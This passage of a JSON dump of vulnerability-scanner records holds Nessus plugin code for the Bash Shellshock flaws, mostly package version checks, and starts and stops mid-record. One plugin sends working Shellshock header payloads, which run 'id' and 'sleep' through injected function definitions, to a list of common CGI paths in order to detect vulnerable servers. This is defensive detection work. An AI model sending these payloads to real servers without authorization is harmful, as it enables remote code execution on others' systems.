(qpkg_check(package:\"app-shells/bash\", unaffected:make_list(\"rge 3.1_p22\", \"rge 3.2_p56\", \"rge 4.0_p43\", \"rge 4.1_p16\", \"ge 4.2_p52\"), vulnerable:make_list(\"lt 4.2_p52\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T16:00:29", "description": "The remote web server is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-04-06T00:00:00", "type": "nessus", "title": "GNU Bash Incomplete Fix Remote Code Injection (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_6278.NASL", "href": "https://www.tenable.com/plugins/nessus/82581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82581);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GNU Bash Incomplete Fix Remote Code Injection (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6278\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_timeout(480);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Do not use get_http_port() here\nport = get_kb_item(\"Services/www\");\nif (!port) port = 80;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Do not test broken web servers\nbroken_web = get_kb_item(\"Services/www/\" + port + \"/broken\");\n\n# Do not test CIM servers as HTTP GET requests can lead to FP situations\nif (port == get_kb_item(\"Services/cim_listener\") || broken_web)\n exit(0, 'The web server on port ' +port+ ' is broken.');\n\ncgis = make_list('/');\n\ncgis1 = get_kb_list('www/'+port+'/cgi');\nif (!isnull(cgis1)) cgis = make_list(cgis, cgis1);\n\ncgidirs = get_kb_list('www/'+port+'/content/extensions/*');\nif (!isnull(cgidirs) && !thorough_tests)\n{\n foreach dir (cgidirs)\n {\n if (preg(pattern:'^/+cgi-bin', string:dir, icase:TRUE))\n cgis = make_list(dir, cgis);\n }\n}\n\n# Add common cgi scripts\ncgis = list_uniq(make_list(cgis,\n \"/_mt/mt.cgi\",\n \"/admin.cgi\",\n \"/administrator.cgi\",\n \"/buglist.cgi\",\n \"/cgi/mid.cgi\",\n \"/cgi-bin/admin\",\n \"/cgi-bin/admin.cgi\",\n \"/cgi-bin/admin.pl\",\n \"/cgi-bin/administrator\",\n \"/cgi-bin/administrator.cgi\",\n \"/cgi-bin/agorn.cgi\",\n \"/cgi-bin/bugreport.cgi\",\n \"/cgi-bin/cart.cgi\",\n \"/cgi-bin/clwarn.cgi\",\n \"/cgi-bin/count.cgi\",\n \"/cgi-bin/Count.cgi\",\n \"/cgi-bin/faqmanager.cgi\",\n \"/cgi-bin/FormHandler.cgi\",\n \"/cgi-bin/FormMail.cgi\",\n \"/cgi-bin/guestbook.cgi\",\n \"/cgi-bin/help.cgi\",\n \"/cgi-bin/hi\",\n \"/cgi-bin/index.cgi\",\n \"/cgi-bin/index.pl\",\n \"/cgi-bin/index.sh\",\n \"/cgi-bin/login\",\n \"/cgi-bin/login.cgi\",\n \"/cgi-bin/mailit.pl\",\n \"/cgi-bin/mt/mt-check.cgi\",\n \"/cgi-bin/mt/mt-load.cgi\",\n \"/cgi-bin/mt-static/mt-check.cgi\",\n \"/cgi-bin/mt-static/mt-load.cgi\",\n \"/cgi-bin/ncbook/book.cgi\",\n \"/cgi-bin/printenv\",\n \"/cgi-bin/printenv.cgi\",\n \"/cgi-bin/quickstore.cgi\",\n \"/cgi-bin/search\",\n \"/cgi-bin/search.cgi\",\n \"/cgi-bin/search/search.cgi\",\n \"/cgi-bin/status\",\n \"/cgi-bin/status.cgi\",\n \"/cgi-bin/test.cgi\",\n \"/cgi-bin/test.sh\",\n \"/cgi-bin/test-cgi\",\n \"/cgi-bin/upload.cgi\",\n \"/cgi-bin/urlcount.cgi\",\n \"/cgi-bin/viewcvs.cgi\",\n \"/cgi-bin/wa\",\n \"/cgi-bin/wa.cgi\",\n \"/cgi-bin/wa.exe\",\n \"/cgi-bin/whois.cgi\",\n \"/cgi-bin-sdb/printenv\",\n \"/cgi-mod/index.cgi\",\n \"/cgi-sys/defaultwebpage.cgi\",\n \"/cgi-sys/entropysearch.cgi\",\n \"/index.cgi\",\n \"/index.pl\",\n \"/index.sh\",\n \"/nph-mr.cgi\",\n \"/query.cgi\",\n \"/session_login.cgi\",\n \"/show_bug.cgi\",\n \"/test\",\n \"/test.cgi\",\n \"/ucsm/isSamInstalled.cgi\",\n \"/whois.cgi\",\n \"/wp-login.php\",\n \"/wwwadmin.cgi\",\n \"/wwwboard.cgi\",\n \"/xampp/cgi.cgi\"));\n\nif (thorough_tests) exts = make_list(\"*\");\nelse exts = make_list(\"cgi\", \"php\", \"php5\", \"pl\", \"py\", \"rb\", \"sh\", \"java\", \"jsp\", \"action\", \"do\", \"shtml\");\n\nforeach ext (exts)\n{\n cgis2 = get_kb_list('www/'+port+'/content/extensions/'+ext);\n if (!isnull(cgis2)) cgis = list_uniq(make_list(cgis2, cgis));\n}\n\nif ( thorough_tests )\n headers = make_list('User-Agent', 'Referrer', 'Cookie');\nelse\n headers = make_list('User-Agent');\n\nscript = SCRIPT_NAME - \".nasl\";\nint1 = rand() % 100;\nint2 = rand() % 100;\n\n\n\nEXPLOIT_TYPE_WAIT = 0;\nEXPLOIT_TYPE_STDOUT = 1;\n\n\nexploits = make_list();\nn = 0;\n\nexploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_STDOUT,\n\t\"payload\", '() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"' + script+' Output : $((' + int1 + '+'+int2+'))\"; }',\n \t\"pattern\", script + \" Output : \" + int(int1 + int2),\n\t\"followup\", \"() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; }\"\n\t);\nif (report_paranoia == 2)\n{\n exploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_WAIT,\n\t\"payload\", '() { _; } >_[$($())] { echo; /bin/sleep $WAITTIME; }'\n\t);\n}\n\n\nvuln = FALSE;\nWaitTime = 5;\n\nforeach cgi (cgis)\n{\nforeach exploit ( exploits )\n{\n foreach header (headers)\n {\n then = unixtime();\n\n if ( exploit[\"type\"] == EXPLOIT_TYPE_WAIT && report_paranoia == 2 )\n {\n http_set_read_timeout(WaitTime * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime), string:exploit[\"payload\"]);\n }\n else payload = exploit[\"payload\"];\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, payload),\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Check that we added our two random numbers and get our expected output\n # ie : int1 = 40, int2 = 65 output should be the following :\n # bash_cve_2014_6271_rce Output : 105\n if (exploit[\"type\"] == EXPLOIT_TYPE_STDOUT && exploit[\"pattern\"] >< res[2])\n {\n vuln = TRUE;\n attack_req = http_last_sent_request();\n\n match = pregmatch(pattern:\"(\"+exploit[\"pattern\"]+\")\", string:res[2]);\n if (isnull(match) || empty_or_null(match[1])) output = chomp(res[2]);\n else output = match[1];\n\n # Try and run id if our above request was a success\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, exploit[\"followup\"]),\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res2[2]))\n {\n attack_req = http_last_sent_request();\n match2 = pregmatch(pattern:\"(uid=[0-9]+.*gid=[0-9]+.*)\",string:res2[2]);\n\n if (isnull(match2) || empty_or_null(match2[1])) output = chomp(res2[2]);\n else output = match2[1];\n }\n }\n else if ( report_paranoia == 2 && exploit[\"type\"] == EXPLOIT_TYPE_WAIT && now - then >= WaitTime )\n {\n InitialDelta = now - then;\n attack_req = http_last_sent_request();\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n WaitTime1 = WaitTime;\n vuln = TRUE;\n\n # Test again with sleep set to 5, 10, and 15\n wtimes = make_list(5, 10, 15);\n\n for ( i = 0 ; i < max_index(wtimes) && vuln == TRUE; i ++ )\n {\n WaitTime1 = wtimes[i];\n http_set_read_timeout(WaitTime1 * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime1), string:exploit[\"payload\"]);\n then1 = unixtime();\n res = http_send_recv3(method : \"GET\", port : port, item : cgi, add_headers : make_array(header, payload), exit_on_fail : FALSE);\n now1 = unixtime();\n\n if ( now1 - then1 >= WaitTime1 && now1 - then1 <= (WaitTime1 + 5 ))\n {\n attack_req = http_last_sent_request();\n InitialDelta = now1 - then1;\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n continue;\n }\n else\n {\n\tvuln = FALSE;\n }\n }\n }\n if (vuln) break;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\n\nif (!vuln) exit(0, \"The web server listening on port \"+port+\" is not affected.\");\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 2,\n request : make_list(attack_req),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T18:56:04", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for bsc#898812, CVE-2014-6277: more troubles with functions bash-4.2-parse-exportfunc.patch for bsc#898884, CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-595.NASL", "href": "https://www.tenable.com/plugins/nessus/78591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78591);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for\n bsc#898812, CVE-2014-6277: more troubles with functions\n bash-4.2-parse-exportfunc.patch for bsc#898884,\n CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T18:58:11", "description": "According to its self-reported version, the remote host is running a version of Cisco UCS Director that could be affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can be exploited.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "Cisco UCS Director Code Injection (CSCur02877) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "href": "https://www.tenable.com/plugins/nessus/78770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78770);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco UCS Director Code Injection (CSCur02877) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a vulnerable version of Bash.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote host is running a\nversion of Cisco UCS Director that could be affected by a command\ninjection vulnerability in GNU Bash known as Shellshock, which is due\nto the processing of trailing strings after function definitions in\nthe values of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can\nbe exploited.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02877\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or upgrade to the version recommended in Cisco bug ID\nCSCur02877\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nchckver = get_kb_item_or_exit(\"Host/Cisco/UCSDirector/version\");\n# Could be unknown version because the WebUI can be detected but\n# no version information could be retrieved.\nif (chckver == UNKNOWN_VER) audit(AUDIT_UNKNOWN_DEVICE_VER, \"Cisco UCS Director\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n (\n ver_compare(ver:chckver, fix:\"4.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"4.1.0.5\", strict:FALSE) <= 0\n ) ||\n (\n ver_compare(ver:chckver, fix:\"5.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"5.0.0.2\", strict:FALSE) < 0\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (chckver =~ \"^5\\.\")\n fix = '5.0.0.0 with hotfix cucsd_5_0_0_0_bash_hotfix / 5.0.0.2 / 5.1.0.0';\n else\n fix = '4.1.0.5 with hotfix cucsd_4_1_0_5_bash_hotfix';\n\n report =\n '\\n Installed version : ' + chckver +\n '\\n Fixed version (s) : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:31:31", "description": "An update of [bash] packages for PhotonOS has been released.", "cvss3": {"score": 8.4, "vector": 